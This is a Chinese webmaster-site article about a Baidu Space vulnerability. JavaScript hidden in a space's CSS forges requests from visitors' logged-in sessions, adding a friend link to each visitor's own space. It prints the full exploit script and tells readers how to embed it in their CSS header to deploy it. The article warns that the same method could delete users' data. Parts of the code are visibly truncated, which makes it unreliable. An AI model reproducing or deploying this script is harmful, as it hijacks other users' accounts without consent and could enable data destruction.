• 文字广告位
  • 文字广告位
  • 文字广告位
您现在的位置: 站长手册 >> 服务器 >> 木马黑客 >> 正文
站内搜索
Google
百度空间存在js破坏漏洞 用户被威胁删除数据
        ★★★ 【字体:

百度空间存在js破坏漏洞 用户被威胁删除数据

雅虎收藏夹 百度收藏 Google书签 Yahoo书签 新浪ViVi 搜狐网摘 365Key网摘 天极网摘 diglog 和讯网摘 POCO网摘 YouNote网摘 博拉网 天下图摘 Del.icio.us digg reddit spurl BlinkList blogmarks
人气: 来源:网络 作者:佚名 所属栏目:木马黑客 [切换到繁體中文]

  感谢本文作者Auc的投递,希望这个问题能引起注意,百度空间的问题已经不少,笔者的不少朋友都能在里面做出一些破坏动作。

  百度空间的发布,给很多国内网民带来了福音,带来了中国space的希望,但与此同时,百度空间的“CSS教程”泛滥至极,访问量从高到低各层次都是在大肆宣传自己复制的css代码(不排除有个别原创),而真正拿hi.baidu.com作为自己space的,专业的博客者很少。

  百度空间似乎可以更名“百度css练手空间”。 在众多复制粘贴爱好者中,不乏有css钻研者,凭着他们对css代码的“天赋”,写出了一些别出心裁的代码,让初学者五体投地,很受css复制爱好者青睐,这部分css作者值得称赞。但与此同时也出现了百度空间的网络黑手,利用百度空间的功能,加入自己的代码,而这些代码又是恶意的,导致百度空间的用户失去了使用空间的自由。

  这是一个网友发来的短信求助,原文如下:

  有个黑客用javascript把我的链接改了。并威胁我如果删除连接就删除我的空间,最怕的就是这样的人。我想问您了解一下他能用同样的手段篡改我页面的其他信息吗。最好能告诉小弟对付这样的人的办法,我实在没辙了,好郁闷。谢谢。

  当时笔者找到该“黑客”的空间,轻松发现其利用css代码加入js代码,然后又利用js代码的功能,分析百度空间在提交数据时的参数,构造出来一个恶意的js代码,功能是提交一个加入友情链接的请求到百度空间,导致访问该网站的已登陆百度空间用户在自己空间上自动的加一个友情链接。

  下边是利用代码:

javascript:document.body.onload = function(){

var req = null;
if(window.XMLHttpRequest) req = new XMLHttpRequest();
else if(window.ActiveXObject){
var msxml = new Array(''MSXML2.XMLHTTP.5.0'', ''MSXML2.XMLHTTP.4.0'', ''MSXML2.XMLHTTP.3.0'', ''MSXML2.XMLHTTP'', ''Microsoft.XMLHTTP'');
for(var i=0;i
try{req.overrideMimeType(''text/xml'')}catch(e){}
}
req.open(''get'',''.'',false);
req.send();
var s=req.responseText;
p=s.indexOf(''passport.baidu.com/?logout'');
if(p>0)
{
p=s.indexOf('''');
if(p>0)
{
p=s.indexOf(''/'',p);
p2=s.indexOf(String.fromCharCode(34),p);
var user=s.substring(p+1,p2);
var name=''+%B0%D9%B6%C8%BF%D5%BC%E4%B7%A2%CC%FB%D6%FA%CA%D6 '';
var link=''http://hi.baidu.com/haomm'';
var desc=''%CA%B9%C4%E3%B5%C4%B0%D9%B6%C8%BF%D5%BC%E4%D6%A7%B3%D6html%B7%A2%CC%FB'';
var url=''/''+user+''/commit'';
var data=''ct=6&cm=1&spRef=''+escape(''http://hi.baidu.com/''+user)+''%2Fmodify%2Fbuddylink%2F0&spBuddyName=''+escape(name)+''&spBuddyURL=''+escape(link)+''&spBuddyIntro=''+escape(desc);
req.open(''post'',url,false);
req.send(data);
}
}

}

  分析:

  该方法危险等级:高级。构造相应的js代码可以删除用户空间的所有数据。该漏洞目前未发现有恶意删除的现象,但已足够危险,请用户小心。

  解决办法:

  由于攻击者可能利用任何用户名的百度空间提交增加,删除,更改的链接,所以目前没有完美解决办法。

  给已经受害者解决办法:删除恶意链接,不再在登陆的情况下访问其空间链接。

  利用方法,演示及声明:

  本空间加入了该漏洞代码的利用演示,使用方法:在自己空间css里面找到#header{},在里面加入上述代码即可。形式如:#header{height:200px;background:url("上文js代码");}请小心使用。

网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)
姓 名: *(必填项) ·注册用户·
Email: QQ号:
评 分: 1分 2分 3分 4分 5分
  • 您可以发表评论支持你喜欢的文章。
  • 请遵守《互联网电子公告服务管理规定》
  • 请遵守中华人民共和国各项有关法律法规。
  • 严禁发表危害国家安全、政治、黄色淫秽等内容的评论。
  • 评论人需对自己在使用评论过程中的行为承担法律责任。
  • 本站管理员有权保留或删除评论内容。
  • 评论内容只代表个人观点,与本网站立场无关。
站内文章搜索
·最新文章      
·热门文章      
| 设为首页 | 加入收藏 | 联系站长 | 友情链接 | 版权申明 | | 京ICP备 05004866号 |
版权所有 2007-2008 站长手册 WWW.ZZSC.ORG 业务联系 zzsc.org#gmail.com